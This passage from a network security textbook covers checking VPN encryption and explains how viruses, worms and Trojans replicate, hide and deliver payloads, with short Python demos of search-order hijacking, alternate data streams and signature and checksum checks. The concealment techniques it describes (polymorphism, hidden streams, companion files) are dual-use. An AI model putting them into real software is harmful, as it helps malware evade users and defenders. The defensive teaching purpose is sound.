While all of this looks correct, the true test is to break out a network analyzer and decode the traffic being transmitted by the firewalls. While the log entries claim that the traffic is being encrypted and decrypted, it never hurts to check. A network analyzer will show you the contents of the packets being transmitted. If you can read the financial information within the data stream, you know you have a problem.

Figure 10.21 shows a packet decode of the FTP session before it is encrypted by the firewall. Notice that you can clearly distinguish that this is an FTP session. You can also identify the IP addresses of the systems carrying on this conversation. If you review the information in the bottom window, you can even see the data being transferred, which appears to be credit card information.

Figure 10.21: The data stream before it is encrypted

Figure 10.22 shows the same data stream, but from outside the firewall. This is what an attacker trying to capture data traveling along the VPN would see. Notice that the transport protocol for each packet is identified as 57. This identifies the transport as a tunneling protocol and prevents you from seeing the real transport used in the encapsulated packet (in this case TCP) or the service riding on that transport (in this case FTP).

Figure 10.22: The data stream after it is encrypted

If you look at the middle window, you will see that the source and destination IP addresses are those of HOLNT200 and Witchvox, respectively. You do not see the true source and destination IP addresses of the data stream. This, combined with hiding the transport and service within the encrypted packet, helps to keep any one data transmission from looking more interesting to an attacker than any other. In fact, there is no certain method of verifying that all of this captured traffic is from a single session; each packet listed in the top window may be from a different communication session taking place simultaneously. In order to find the FTP session, an attacker might be forced to decrypt hundreds or even thousands of packets.
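What the analyzer reports can be mimicked by reading the protocol field out of a raw IPv4 header. A sketch follows, with a hand-built header and illustrative tunnel-endpoint addresses; it shows how every tunneled packet reports protocol 57 regardless of what it carries.

import struct

SKIP_PROTOCOL = 57  # IP protocol number carried by the tunneled packets

def transport_protocol(ipv4_header: bytes) -> int:
    """Pull the protocol field (byte 9) out of a raw IPv4 header,
    as an analyzer does when labeling captured packets."""
    return ipv4_header[9]

# A minimal, hand-built IPv4 header for illustration: protocol=57, with
# the source and destination set to the two (example) router addresses.
header = struct.pack(
    "!BBHHHBBH4s4s",
    0x45, 0, 20, 0, 0, 64,
    SKIP_PROTOCOL, 0,
    bytes([198, 51, 100, 1]),    # illustrative tunnel endpoints
    bytes([203, 0, 113, 1]),
)
assert transport_protocol(header) == SKIP_PROTOCOL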
The real test is the bottom window. Note that your data is now scrambled into ciphertext and is no longer readable. This prevents an attacker from being able to read the enclosed data, as you could in Figure 10.21. In order to get to this information, an attacker would need to identify which packets contain the financial information and decrypt them with a brute force attack.

Given these two packet traces, it is safe to say that your VPN is functioning properly and encrypting the data that flows between the two encryption domains.

Summary
In this chapter we defined the term virtual private networking and discussed when it is beneficial to use a VPN. We also covered what you should look for in a VPN product and what your options are for deployment. Finally, we walked through the configuration of a VPN between two firewalls and looked at the effect it had on the passing data stream.

In the next chapter, you will look at viruses and how you can go about keeping these little pieces of destructive code off your network.

Chapter 11: Viruses, Trojans, and Worms: Oh My!
Just about every system administrator has had to deal with a virus at one time or another. This fact is extremely disheartening, because these tiny pieces of code can cause an immense amount of damage. The loss in productivity and intellectual property can be expensive for any organization. Clearly, the cost of recovering from a virus attack more than justifies the cost of taking preventive measures.

Viruses: The Statistics
While the early 1990s seemed to be an era of relative safety from viruses, the Internet has dramatically increased—and continues to increase—the threat computer systems face from hostile code. An NCSA (National Computer Security Association) study in 1997 illustrated the then-phenomenal statistic that 99.33 percent of the organizations polled had experienced a recent virus episode. In 1996, the monthly infection rate was 10 out of every 1,000 computers. In 1997, this rate more than tripled. In a study released in October 2000, ICSA (now TruSecure) noted that virus incidents per 1,000 machines were at least doubling every year—for five years running—with 160 machines per 1,000 having been infected in 2000. Other items noted in the study:
• Annual losses per company due to virus infection were in the hundreds of thousands of dollars.
• Over 40 percent of the companies surveyed had experienced data loss due to virus infections.
• Two-thirds of companies had file-related e-mail problems due to incoming viruses.
• Only one of the surveyed companies recorded never having had a virus during the year covered by the survey—illustrating an infection rate of 99.67 percent.
• Major virus infections (25 or more computers infected at once) happened to 51 percent of the companies.
• Of the 51 percent with major infections, 80 percent received the virus by way of e-mail attachments.
• 64 percent of server outages due to virus infections lasted more than an hour, with a median downtime of 21 hours.
• Only 70 percent of PCs were protected with full-time automatic anti-virus protection.
• 76 percent of organizations polled believed the virus problem was worse than the year before (1999).

On an interesting note, the survey observed that reports of boot viruses, or floppy-borne viruses, were nearly nonexistent. This is in direct contrast to the NCSA survey of 1997, which put the brunt of the blame on shared floppy disks.
With file sharing now being done primarily through e-mail, it is natural that the Internet has become a replacement for the floppy disk as the carrier of malicious code.

Note: But viruses aren't just for computers anymore. In August 2000, the first malicious code affecting PDAs (Personal Digital Assistants) was recorded. The program, Liberty Crack, posed as an emulator, but in reality it wiped applications from handheld devices running the Palm OS. And in June of the same year, the Timofonica virus, although executed on computers, was designed to send text messages to all cell phones in Spain—potentially overwhelming the entire cell network.

What Is a Virus?
The precise definition of a virus has been hotly debated for many years. Experts have had difficulty describing the specific traits that characterize a true virus and separate it from other types of programs. To add to the confusion, people tend to lump viruses, worms, Trojan horses, and so on under the generic umbrella of "virus." This is partly because there is no single industry-accepted descriptor that includes all of these program types, so some confusion remains over the exact definition of what constitutes a virus.

The generally accepted definition of a virus is a program that can be broken into three functional parts:
• Replication
• Concealment
• Bomb

The combination of these three attributes makes the collective program a virus.

Replication
A virus must include some method of replication, that is, some way to reproduce or duplicate itself. When a virus reproduces itself in a file, this is sometimes referred to as infection. Since most people would never knowingly load a virus on their system, replication insures that the virus has some method of spreading.

Replication occurs when the virus has been loaded into memory and has access to CPU cycles. A virus cannot spread by simply existing on a hard disk; an infected file must be executed in order for the virus to become active. "Executed" is a generic term here: it could refer to an infected executable file initiated from a command prompt, or to an infected Microsoft Word document loaded into an application capable of processing embedded macros. In either event, there is now some process using CPU cycles that helps to spread the virus code.

File Infection
The method of replication falls into one of two categories. The first is file infection. This method of replication relies on the virus's ability to attach itself to a file. In theory, any type of file is vulnerable to attack. Attackers tend to focus, however, on files that will provide some form of access to CPU cycles. This may be through direct execution or by having the code processed by some secondary application.

For example, a Word document does not directly execute any commands in memory. The Microsoft Word application, however, is capable of reading macro commands embedded within the Word document and executing them in memory. So while it is the Word document that is actually infected, it is the Word application that provides the transport for replication.

A similar type of virus was popular many years ago that leveraged vulnerabilities in DOS's ANSI.SYS driver. Any text document can contain embedded ANSI commands.
If a user had the ANSI driver loaded, these commands could be parsed from a text file and executed, even if the user was simply viewing the text within the file. There have even been viruses that embed themselves in raw source code files. When the code is eventually compiled, the virus becomes capable of accessing CPU cycles, thus replicating even further.

The most popular type of infection, however, is to infect directly executable files. In the PC world, these are files with a COM, EXE, PE, or BAT file extension. A virus will add a small piece of code to the beginning of the file, to insure that when the file is executed, the virus is loaded into memory before the actual application. The virus will then place its remaining code within or at the end of the file.

Once a file becomes infected, the method of replication can take one of two forms, referred to as resident and nonresident replication. A resident replicating virus, once loaded into memory, waits for other programs to be executed and then infects them when they are. Viruses such as Cabanas have shown that this is possible even on protected-memory systems such as Windows NT. A nonresident replicating virus will select one or more executable files on disk and directly infect them without waiting for them to be processed in memory. This will occur every time the infected executable is launched.

Sometimes a virus may take advantage of the extension search order of the operating system in order to facilitate the loading of the virus code without actually infecting the existing file. This type of virus is known as a companion virus. A companion virus works by insuring that its executable file is launched before the legitimate one.

For example, let's say you have an accounting program that you initialize by executing the file GL.EXE. If you try to launch your accounting program by simply typing gl, an attacker could generate a virus named GL.COM that loads itself into memory and then passes control over to the GL.EXE file. This is possible because when a file extension is not specified, DOS and Windows will first try to execute a file with a COM extension, then an EXE extension, and finally a BAT extension. Once a match is found, the operating system ends the search and executes the program. In our example, the operating system would find the virus file (COM extension) before the real program file (EXE extension) and execute the virus file.
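The COM-before-EXE lookup that a companion virus exploits is easy to demonstrate. A minimal sketch of the search order follows; the resolve_command helper is illustrative, not an actual DOS routine, and DOS's case-insensitive matching is not modeled.

from pathlib import Path
from typing import Optional

# DOS and Windows resolve an extensionless command in this fixed order,
# which is exactly what a companion virus exploits.
SEARCH_ORDER = [".com", ".exe", ".bat"]

def resolve_command(name: str, directory: str = ".") -> Optional[Path]:
    """Return the file DOS would execute for an extensionless command."""
    for ext in SEARCH_ORDER:
        candidate = Path(directory) / (name + ext)
        if candidate.exists():
            return candidate   # first hit wins; the search stops here
    return None

# With both gl.com (the companion) and gl.exe (the real program) present
# in the directory, typing "gl" runs gl.com first.
print(resolve_command("gl"))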
Boot Sector Replication
The second category of replication is boot sector replication. These viruses infect the system area of the disk that is read when the disk is initially accessed or booted. This can include the master boot record, the operating system's boot sector, or both.

Note: Viruses that use both file and boot sector replication technologies are known as multi-partite.

A virus infecting these areas will typically take the system instructions it finds and move them to some other area on the disk. The virus is then free to place its own code in the boot record. When the system initializes, the virus loads into memory and simply points to the new location for the system instructions. This allows the system to boot in a normal fashion—except the virus is now resident in memory.

Note: A boot sector virus does not require you to execute any programs from an infected disk in order to facilitate replication. Simply accessing the disk is sufficient. For example, most PCs will do a systems check on boot up that verifies the operation of the floppy drive. Even this verification process is sufficient to activate a boot sector virus, if one exists on a floppy left in the machine. This can cause the hard drive to become infected, as well.

Boot sector viruses rely on disk-to-disk contact to facilitate replication; both disks must be attached to the same machine. For example, if you access a shared directory on a system with a boot sector virus, the virus cannot replicate itself to your local machine, because the two machines do not share memory or processor cycles. There are, however, programs known as droppers that can augment the distribution of boot sector viruses, even across a network. A dropper is effectively an installation utility for the virus. The dropper is typically coded to hide the virus contained within it and escape detection by anti-virus software. It also poses as some form of useful utility in order to entice a user to execute the program. When the dropper program is executed, it installs the virus on the local system.

Note: By using a dropper, an attacker could theoretically infect a system with a boot sector virus even across a network. Once the virus has been dropped, however, disk-to-disk access is required for further replication.

Common Traits of File Infection and Boot Sector Replication
What is common to file and boot sector replication is that a virus must have some method of detecting itself. This is to avoid potential corruption caused by performing a double infection. If corruption does occur, the program may become unusable or the user may suspect that something is wrong. In either event, the replication process may cease. If replication cannot continue, the virus is doomed to die out, just like any living organism.

An Interesting Catch-22
One of the methods used by virus programmers to insure that duplication does not occur can also be used to detect the virus and prevent it from infecting files. Many virus programmers identify a code string that they know is unique to their particular virus. The virus is then programmed to look for this code string before it infects a file. If a match is found, the file is not infected.

Anti-virus software can be programmed to look for this signature code string. This allows the software to quickly identify the existence of the virus. Also, by adding this code string to a file without the actual virus code, the file can be inoculated against infection by the actual virus.
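Both sides of this catch-22 reduce to a simple byte-string search. A minimal sketch follows, assuming a made-up signature value; real scanners match byte patterns taken from disassembled virus code.

SIGNATURE = b"EXAMPLE-VIRUS-MARKER"   # hypothetical signature string

def is_infected(path: str) -> bool:
    """Flag a file that contains the known signature."""
    with open(path, "rb") as f:
        return SIGNATURE in f.read()

def inoculate(path: str) -> None:
    """Append the bare signature so the virus's own self-check
    skips this file, even though no virus code is present."""
    if not is_infected(path):
        with open(path, "ab") as f:
            f.write(SIGNATURE)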
\nAnd because VBA is easy to learn and program, the technical level of expertise necessary to create a macro virus \nis very low. \nConcealment \nIn order to facilitate replication, a virus must have one or more methods of masking its existence. If a running \nvirus were to simply show up on your Windows 98 Taskbar, you’d see right away that there was a problem. \nViruses employ a number of methods to camouflage their presence. \nSmall Footprint \nViruses tend to be very small. Even a large virus can be less than 2KB in size. This small footprint makes it far \neasier for the virus to conceal itself on the local storage media and while it is running in memory. In order to \ninsure that a virus is as small as possible, most viruses are coded using assembly language. \nIf a virus is small enough, it may even be able to attach itself to a file without noticeably affecting the overall file \nsize. There are viruses known as cavity viruses that will look for repetitive character sequences within a file \n" }, { "page_number": 222, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 222\n(usually a null value) and overwrite this area for virus storage. This allows the virus to store the bulk of its code \nwithin a file without affecting the reported file size. \nAttribute Manipulation \nIn order to protect files from virus infection, early DOS computer users would set their executable file permissions \nto read-only. The thinking was that if the file could not be modified, a virus would be unable to infect it. Of \ncourse, virus programmers responded by adding code to the virus that allowed it to check the file’s attributes \nbefore infection. If the attributes were set to read-only, the virus would remove the read-only attribute, infect the \nfile, and then set the attributes back to their original values. Needless to say, this method of protection is of little \nvalue against modern viruses. \nThis is not true in a true multi-user environment, however, where the permissions level can be set on a user-by-\nuser basis. If administrator-level privileges are required to change a file’s permissions, the virus cannot change \nthese attributes when run from a regular user account. \nFor example, in a NetWare server environment, regular users are given read-only access to the public directory. If \na user’s computer contracts a virus, the virus will be unable to spread to other machines by infecting files within \nthe public directory, because the virus will be unable to modify these files. Of course, if the administrator’s \ncomputer becomes infected, all bets are off—this account does have write access to the public directory. Setting \nthe minimum level of required permissions not only helps to enhance security—it can help to prevent the spread of \nviruses, as well. \nNote \nInterestingly, this lack of account security is at the root of why viruses have flourished in \nDOS, Windows 9x, and Mac environments. There have been very few viruses written for \nUNIX and Windows NT/2000 because the ability to set file permissions hinders the \nvirus’s ability to replicate and infect additional files. This is one of the reasons why virus \nprogrammers have focused on other platforms. \nAlong with permission attributes, viruses can also modify the date and time stamps associated with a file. This is \nto insure that a user is not clued in to a problem by noticing that a file has been modified. 
Early virus scanners would look for date changes as part of their virus-detection routine. Since most modern viruses restore the original date and time stamps after infection, this method of detection has become less than effective.

Note
Windows NT systems running NTFS are particularly vulnerable due to the use of data streams. A data stream is a hidden file that can be associated with a regular file. This provides a hidden area for an attacker to hide virus code. Data streams are not visible when you use Explorer or the DIR command. You must reference the stream directly (meaning you already know it exists) or use a tool specifically designed to find data streams, such as LADS (List Alternate Data Streams), freeware that can be downloaded at www.heysoft.de/nt/ep-lads.htm.
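On an NTFS volume you can demonstrate how invisible a stream is with nothing more than standard file calls. The sketch below assumes a Windows machine with an NTFS drive; the file and stream names are made up.

    import os

    # Create an ordinary file, then attach an alternate data stream to it.
    with open("report.txt", "w") as f:
        f.write("An ordinary file.")
    with open("report.txt:hidden", "w") as f:          # file:stream syntax
        f.write("This text appears in neither DIR nor Explorer.")

    print(os.path.getsize("report.txt"))               # reports the visible data only

Note that the file's reported size does not change, which is precisely what makes streams attractive as a hiding place.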
\nEncryption \nVirus programmers have not overlooked the benefits of encryption. Encryption allows the virus programmer to \nhide telltale system calls and text strings within the program. By encrypting the virus code, virus programmers \nmake the job of detecting the virus much more difficult. \nDetection is not impossible, however, as many viruses use a very simple form of encryption and the same key for \nall virus code. This means that while it may be difficult to retrieve the actual virus code, the decryption sequence \nwill be identical for all infected files. If the decryption key can be broken, it can be used to detect all future \ninstances of the virus. Even if the decryption key is not broken, the cipher string becomes a telltale signature that \nanti-virus software can use to detect the virus. \nThe efficiency of this method of detecting encrypted viruses depends on the resulting cipher string. Remember that \nthe anti-virus software has no way of knowing whether it is looking at encrypted or plain text information. If the \ncipher string can be made to resemble some benign form of code, the anti-virus software will have a difficult time \ndifferentiating between infected and non-infected files. \nPolymorphic Mutation \nA polymorphic virus has the ability to change its virus signature from infected file to infected file while still \nremaining operational. Many virus scanners detect a virus by searching for telltale signature code. Since a \npolymorphic virus is able to change its appearance between infections, it is far more difficult to detect. \nOne way to produce a polymorphic virus is to include a variety of encryption schemes that use different \ndecryption routines. Only one of these routines would be available in any instance of the virus. This means that an \nanti-virus scanner will be unable to detect all occurrences of the virus unless all the decryption routines are known. \nThis may be nearly impossible if the virus utilizes a random key or sequence when performing encryption. For \nexample, many viruses include benign or dormant code that can be moved around within the virus before \nencryption without affecting the virus’s operational ability. The cipher string created by the process will vary with \neach instance of the virus, because the code sequence will vary. \nThe most efficient method of creating a polymorphic virus is to include hooks into an object module known as a \nmutation engine. Because this engine is modular, it can easily be added to any existing virus code. The mutation \nengine includes a random-number generator, which helps to scramble the resulting ciphertext even further. Since a \nrandom-number generator is used, the resulting ciphertext becomes unpredictable and will vary with every file \ninfected. This can make the virus nearly impossible to detect, even for other instances of the virus itself. \nBomb \nOur virus has successfully replicated itself and avoided detection. The question now becomes, “What will the \nvirus do next?” Most viruses are programmed to wait for a specific event. This can be almost anything—including \nthe arrival of a specific date, the infection of a specific number of files, or even the detection of a predetermined \nactivity. \nOnce this event has occurred, the true purpose of the virus becomes evident. This might be as benign as playing a \ntune through the computer’s speakers, or as destructive as completely wiping out all the information that has been \nstored on the computer’s hard drive. 
\nMost bombs can perform a malicious task because the current DOS and Windows environments provide no clear \ncontainment between the operating system and the programs they run. A virus can have direct access to lower-\nlevel functions. This functionality is provided because the operating system expects programs to be trustworthy. \n" }, { "page_number": 224, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 224\nFor example, DOS and Windows applications are allowed to directly address memory and the interrupt table. \nWhile this can help to boost an application’s performance by allowing it to circumvent the operating system, it \nalso provides much of the functionality required for a virus to utilize stealth. \nThere are limits to what a bomb can do, however. While a bomb can render a computer unusable, it cannot cause \nphysical damage to any of the components. This means that in a worst-case scenario you can always completely \nwipe out all the data on a computer and start from scratch. Not exactly the first option you would want to hear—\nbut at least you know your hardware will remain intact and functional once the virus is eliminated. \nHoaxes \nSometimes referred to as a socially engineered viruses, hoaxes can be just as troublesome as the real thing. Social \nengineering viruses meet all the criteria of a normal virus, except they rely on people to spread the infection, not a \ncomputer. A good example of a social engineering virus is the Good Times virus hoax that has circulated the \nInternet for many years. This e-mail message announces that a dangerous virus is being circulated via e-mail and \nhas the ability to wipe out all the files on your computer. This message even claims that the virus’s existence has \nbeen confirmed by AOL (who we all know is the world’s authority on viruses). People concerned that their friends \nmay be attacked by this virus would then forward the hoax to every person in their address books. How does a \nsocial engineering virus meet the criteria that define a true virus? \nReplication These viruses rely on two human traits in order to replicate themselves to other \nsystems: good intentions and gullibility. Since it is human nature to help others, we are more than \nhappy to circulate what appear to be virus warnings, e-mail requests from dying children, and the \nlike, to other computer users. Since it is also human nature to believe what we read—and perhaps to \nbe a bit too lazy to verify information—we might forward the virus along without verification. \nConcealment In order to conceal the threat, the virus will use language that makes the message \nbelievable to the average user. For example, the message may claim that a company like AOL, \nIBM, or Microsoft has verified the existence of the virus mentioned in the alert. Since these are \ncomputer-related companies familiar to the average user, the message appears to be authoritative. \nBomb This is the part of social engineering viruses that most people do not even think about. The \n“bomb” is wasted bandwidth, as well as unnecessary fear. Since the message is a hoax, bandwidth \nis wasted every time it is circulated. Since the sender has assumed a sense of urgency with the \nmessage, the virus is typically sent out en masse. 
No virus scanner can detect social engineering viruses. Only education and the verification of information can keep these viruses from spreading.

Note
A wonderful resource on social engineering viruses is the Computer Virus Myths home page located at www.vmyths.com.

Worms

A computer worm is an application that can replicate itself via a permanent or dial-up network connection. Unlike a virus, which seeds itself within the computer's hard disk or file system, a worm is a self-supporting program. A typical worm maintains only a functional copy of itself in active memory; it does not even write itself to disk.

There are actually two different strains of computer worms. The first operates on only a single computer, just like a typical application. This type of worm uses the system's network connection only as a communication channel, in order to replicate itself to additional systems or to relay information. Depending on the worm's design, it may or may not leave a copy of itself running on the initial system once it replicates to a new host.

The second strain of computer worm actually uses the network connection as a nervous system, so that it may have different segments of its code running on multiple systems. When a central node coordinates the effort of all these segments (a sort of "brain"), the worm is referred to as an octopus.

Note
The name worm is derived from John Brunner's 1975 novel The Shockwave Rider. The story's hero uses a program called a "tapeworm" to destroy the totalitarian government's computer network; this destruction removes the government's power base, thus freeing the people under its control. Before the publication of this story, there was no universally agreed-upon name to describe these programs (life imitating art, so to speak).

The Vampire Worm

Worms have not always been considered a bad thing. In the 1980s, John Shoch and Jon Hupp of Xerox did some wonderful worm research in order to show just how beneficial these programs could be. To this end, they created a number of worm programs and used them for administration on Xerox's network.

The most effective was the vampire worm. This worm would sit idle during the day, when system utilization was high. At night, however, the worm would wake up and use idle CPU time to complete complex and highly processor-intensive tasks. The next morning, the vampire worm would save its work and go back to sleep.

The vampire worm was extremely effective until the day that Xerox employees came into work and found that all the computer systems had crashed from a malfunctioning process. When the systems were restarted, they were immediately crashed by the worm. This led to the worm's removal from all of the network's systems and an end to further testing.
The Great Internet Worm

Worms received little attention until November 3, 1988—the day after the great Internet worm was released onto the Internet. In less than six hours, this 99-line program had effectively crippled some 6,000 of the Sun and VAX systems connected to the Internet.

The program was written by Robert Morris, the son of one of the country's highest-ranking security experts at the time. It has been suggested that writing the worm was not a malicious act, but the effort of a son to break out from his father's shadow. This thinking is supported by the worm code itself, which performs no intentionally destructive functions.

What the worm did do was start a small process running in the background of every machine it encountered. This experiment would probably have gone completely unnoticed—except for one minor programming flaw. Before infecting a host, the worm did not check whether the system was already infected. This led to the multiple infection of systems. While one instance of the worm created little processor load, dozens—or possibly hundreds—of instances would bring a system to its knees.

Administrators found themselves in a losing battle. As a system was cleaned and restarted, it would quickly become infected again. When it was discovered that the worm was using Sendmail vulnerabilities to move from system to system, many administrators reacted by disconnecting from the Internet or by shutting down their mail systems. This probably did more harm than good, because it effectively isolated a site from updated information on the worm—including information on how to prevent infection.

From all the chaos of this incident, many good things did arise. It took an episode of this magnitude to change people's thinking about system vulnerabilities, which until then had simply been considered minor bugs. The Internet worm incident pushed these deficiencies into a class of their own, and it spawned the creation of the Computer Emergency Response Team (CERT), an organization that is responsible for documenting, and helping to resolve, computer-related security problems.

The WANK Worm

While the Internet worm is probably the best known, it was certainly not the worst worm ever encountered. In October 1989, the WANK (Worms Against Nuclear Killers) worm was released on unsuspecting systems. While highly destructive, this worm was unique in that it infected only DEC systems and used only the DECnet protocol (it was not spread via IP). This worm would

• Send e-mail (presumably to the worm's creator) identifying which systems it penetrated, along with the logon names and passwords used
• Change passwords on existing accounts
• Leave additional trapdoor access into the system
• Find users on random nodes and ring them using the phone utility
• Infect local COM files so that the worm could reactivate later if it was cleaned from the system
• Change the announcement banner to indicate that the system had been "WANKed"
• Modify the logon script to make it appear that all of a user's files were being deleted
• Hide the user's files after logon so the user would be convinced that the files had been deleted

As you can imagine, this worm ruined more than one system administrator's day. It took quite some time to successfully purge this worm from all the infected systems.
\nIRC Worms \nHostile worms exist even today One of the more common types are IRC (Internet Relay Chat) worms. These \nworms affect all users running mIRC communication software. When a user joins a specific IRC channel, the \nworm infects the user’s system. It then sits quiet and waits for one of the IRC channel participants to issue a \nrecognized keyword. \nEach keyword is designed to elicit some form of specific action. For example, one keyword is designed for victims \nrunning UNIX. When the keyword is issued, the worm sends a copy of the local password file to the IRC user who \nissued the command (using mIRC’s DCC command). Another keyword is designed for Windows 95/98 users and \ndelivers a copy of the Registry. Still another gives the person issuing the command full read and write access to \nthe local hard drives of all infected systems. \nMacro Worms \nSimilar to macro viruses, macro worms use VBA and Microsoft applications as their executing environment. A \nmacro worm typically spreads by sending a copy of itself as an innocuously (but appealingly) named attachment to \nevery e-mail address stored in Outlook or Outlook Express. The worm depends on social engineering, (naming the \nattachment “I Love You,” for example), and the default configuration in Outlook (which hides the filename \nextensions of attachments) to induce the recipient to execute the worm. Because of the success of these worms, \n(including the infamous I Love You worm), some programmers have created hybrid programs that are really more \nvirus than worm, deleting files and causing other operating system mischief. \n \nTrojan Horses \nA Trojan horse, as the name implies, is an application that hides a nasty surprise within an innocuous or pleasant \npackage. The surprise is a process or function, specifically added by the Trojan horse’s programmer, that performs \nan activity that the user is unaware of—and would probably not approve of. The visible application may or may \nnot do anything that is actually useful. The hidden application is what makes the program a Trojan horse. \nWhy Trojan Horses Are Not Viruses \nTrojan horses (or “Trojans” for short) differ from viruses in that they do not replicate or attach themselves to other \nfiles. A Trojan is a stand-alone application that had its bomb included from the original source code. It does not \nbecome malicious due to the effects of another application. \nFor example, there are a number of UNIX Trojans that are made to replace existing network applications. An \nattacker may replace the telnet server process (telnetd) with one of his own creation. While the program will \nfunction identically to the standard telnetd program, it will quietly record all logon names and passwords that \nauthenticate to the system. Conversely, an attacker could also replace the telnet client application, giving himself \nvalid account information on remote systems. This would allow him to systematically penetrate every server on a \nnetwork. \nAttackers have also created Trojans designed to be immediately destructive. For example, in April 1997, many \npeople fell prey to the AOL4FREE.COM Trojan. While users thought they had found a utility that would give \nthem a free account on AOL, what they actually received was a wonderful tool for removing all those pesky files \n" }, { "page_number": 227, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 227\non a system’s local hard drive. 
The most successful (hence most common) Trojan attack targets users who run Windows 95/98 or Windows NT/2000 Dial-Up Networking. This Trojan has been programmed into a number of helpful utilities designed to entice the user to download them. When the utility is installed, the Trojan enumerates the user's phone book and grabs a copy of the Windows Dial-Up Networking cache. It then uses a number of Windows API calls to e-mail this information to the Trojan's author. Besides potentially yielding access to the local system, this gives the attacker valid ISP account information to use in attacking other systems.

Did I Just Purchase a Trojan Horse?

Of course, not all Trojans have been written by true attackers. For example, some users were extremely surprised to find out that when they joined the Microsoft Network, the software made a complete inventory of system hardware and software—including Microsoft software and competitors' products. When the user connected to the network, this information was automatically forwarded to Microsoft, which could collect marketing data and check for proper product licensing. While Microsoft claimed that this information was being collected for technical support use only, many people considered it a clear invasion of privacy.

There are many other situations in which vendors add functionality at the expense of breaching a customer's security posture. For example, in May 1998, it became public knowledge that 3COM, as well as a number of other network hardware vendors, was including "back door" accounts for access into its switch and router products. These undocumented accounts are typically invisible to the end user and cannot be deleted or disabled. While vendors again claimed they had created these back doors for technical support reasons (in case an administrator forgets a password, for example), such an account still leaves the product horribly exposed and the administrator woefully uninformed.

Such activities exist in a gray area between technical support and Trojans. While these undocumented back doors are being added by reputable vendors, they compromise security and fail to make the customer aware of potential exposure. Clearly, back-door access is a feature that many administrators would like to disable—but they have to learn of its existence first.

Preventive Measures

Now that you have seen the implications of these rogue programs, what can you do about them? The only foolproof way to identify a malicious program is to have a knowledgeable programmer review the source code. Since most applications are distributed only in executable format, this would require reverse engineering every file on the system—obviously too time-consuming and expensive to be a feasible option for the typical organization.

With this in mind, any other preventive measure will fall short of being 100 percent effective. You are faced with performing a risk analysis in order to determine just how much protection you actually require. There are many different techniques that you can employ to prevent infection. Each has its strengths and weaknesses, so a combination of three or more techniques is usually best.

Access Control

Establishing an access control policy is not only a good security measure; it can help to prevent the spread of rogue programs, as well.
Access control should not be confused with file attributes (such as read-only or system), which can easily be changed by an infecting program. True access control needs to be managed through a multi-user operating system that allows the system administrator to set up file permission levels on a user-by-user basis.

Access control will not remove or even detect the existence of a rogue program. It is simply one method of helping your systems resist infection. For example, most viruses count on the infected machine having full access to all files (such as the default permissions under Windows NT). If a savvy system administrator has modified these default permissions so that users have only read access to their required executables, a virus will be unable to infect those files.

Note
This will not work for all executables, however. Some actually require that they modify themselves during execution. Users need write access to these executables, and you can expect their time and date stamps to change on a regular basis. How do you know which executables require write access? Usually you don't. It's a matter of trial and error to see which executables change their date and time stamps, or break, when write access is not provided. These self-writing executables are rare, however; you should not run into them very often.

Checksum Verification

A checksum, or Cyclic Redundancy Check (CRC), is a mathematical verification of the data within a file. It allows the contents of the file to be expressed as a numeric quantity. If a single byte of data within the file changes, the checksum value changes as well, even if the file size remains constant. Typically, a baseline is first created from a non-infected system. The CRC is then recomputed at regular intervals in order to look for file changes.

There are a couple of drawbacks to this method. First, a CRC cannot actually detect file infection; it can only look for changes. This means that self-writing executables would fail the checksum verification on a regular basis. Also, even if a change is actually due to a virus, a CRC has no way of cleaning the file. Finally, many viruses have been specifically written to fool a CRC into thinking that the file information has not changed.

Tip
While a CRC is not the most effective check against viruses, it can be a big help in discovering Trojan horse replacements. A Trojan designed to replace an existing authentication service (such as telnet or FTP client and server software) does not simply modify the existing files; it replaces them. This file replacement would be flagged and reported by a checksum verification. A virus scanner, however, would completely miss this problem, provided that the files did not include any virus-like code. This makes the CRC far more effective at identifying Trojans.
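The baseline-and-verify cycle is easy to sketch. The example below uses Python's zlib.crc32 and a JSON file for the baseline; the watched file list and baseline path are hypothetical.

    import json
    import zlib

    WATCHED = ["/bin/login", "/usr/sbin/in.telnetd"]   # hypothetical file list

    def crc_of(path):
        """Compute the CRC-32 of a file's contents."""
        with open(path, "rb") as f:
            return zlib.crc32(f.read())

    def make_baseline(out="baseline.json"):
        """Record the current CRC of every watched file."""
        with open(out, "w") as f:
            json.dump({path: crc_of(path) for path in WATCHED}, f)

    def verify(baseline="baseline.json"):
        """Report any watched file whose CRC no longer matches the baseline."""
        with open(baseline) as f:
            known = json.load(f)
        for path, crc in known.items():
            if crc_of(path) != crc:
                print("CHANGED:", path)    # possible Trojan replacement

As the Tip notes, a CRC can be fooled deliberately; a cryptographic hash is a stronger choice when tampering, rather than accident, is the concern.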
\nAgain, there are a few problems. The first is that viruses and normal programs share a lot of similar attributes: it \ncan be extremely difficult to distinguish between the two. For example, running the FDISK utility will also trigger \nthe BIOS virus warning just described. Even though FDISK is not a virus (unless you subscribe to the school of \nthought that all Microsoft programs are viruses), it will still trigger the warning because its activity is considered \nsuspicious. This is referred to as a false positive— the BIOS thinks it has detected a virus when in fact it has not. \nThis brings us to the second problem with process monitoring, which is the requirement of user intervention and \nproficiency. For example, a user who receives the false positive just mentioned must be computer savvy enough to \nrealize that a true virus was not actually detected, but that the normal operation of FDISK set off the alarm. \nThen again, maybe there is in fact a boot sector virus on the floppy disk where FDISK is stored. This could cause \nthe user to assume that a false positive has been reported when in fact there is an actual virus. While this would \ntrigger the BIOS virus alert at a different point in the process (when FDISK is loaded rather than when FDISK is \nclosed), the end user needs a high level of skill and computer proficiency just to identify virus problems \naccurately. \nThe problem of correctly distinguishing between a virus and a normal application becomes even more apparent \nwhen you start trying to monitor other types of activity. Should file deletions be considered suspicious? Certainly \na file maintenance utility will be used to delete files from time to time, generating frequent false positives. The \nsame would be true for attempting to monitor file changes, memory swapping, and so on. All of these activities \nmay be performed by a virus—but they may also be performed by a normal application. \nAbout the only useful process monitoring is the BIOS virus warning described earlier. While there is the potential \nfor false positive warnings, it is actually pretty rare for a user to be running FDISK or some other application that \nwill legitimately attempt to write to the boot sector. Typically, this will only occur if the user is installing a new \noperating system. This means that the frequency of false positives would be minimal. \nVirus Scanners \nThe most popular method of detecting viruses is through the use of virus-scanning software. Virus scanners use \nsignature files in order to locate viruses within infected files. A signature file is simply a database that lists all \nknown viruses, along with their specific attributes. These attributes include samples of each virus’s code, the type \nof files it infects, and any other information that might be helpful in locating the virus. By using a separate file to \nstore this information, you can update your software to detect the latest viruses by replacing this single file. You \ndo not have to update the entire program. This is useful because many new viruses are detected each 